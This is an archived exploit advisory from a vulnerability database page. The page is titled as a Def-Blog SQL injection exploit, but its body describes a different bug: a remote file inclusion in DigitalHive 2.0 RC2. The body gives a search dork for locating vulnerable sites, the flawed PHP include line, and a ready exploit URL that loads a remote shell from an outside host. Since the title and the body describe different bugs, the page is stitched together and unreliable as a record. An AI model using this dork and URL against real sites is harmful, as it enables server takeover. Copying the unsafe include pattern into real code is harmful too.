Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14715
HistoryOct 16, 2006 - 12:00 a.m.

Def-Blog <= v1.0.1 (article) Remote SQL Injection Exploit

2006-10-1600:00:00
vulners.com
20

#==============================================================================================
#DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.digitalhive.com/base.php?page=site/telechargements.php&amp;var=accueil

#Version : v2.0 RC2

#================================================================================================

#DORK : "Powered by DigitalHive"

#================================================================================================
#Bug in : template/purpletech/base_include.php

#Vlu Code :
#--------------------------------

<?php include ($_GET["page"]); ?>

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/template/purpletech/base_include.php?page=http://SHELLURL?

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo

sPECial THanks to : Coder-AZH@CKTEAM

==================================================================================================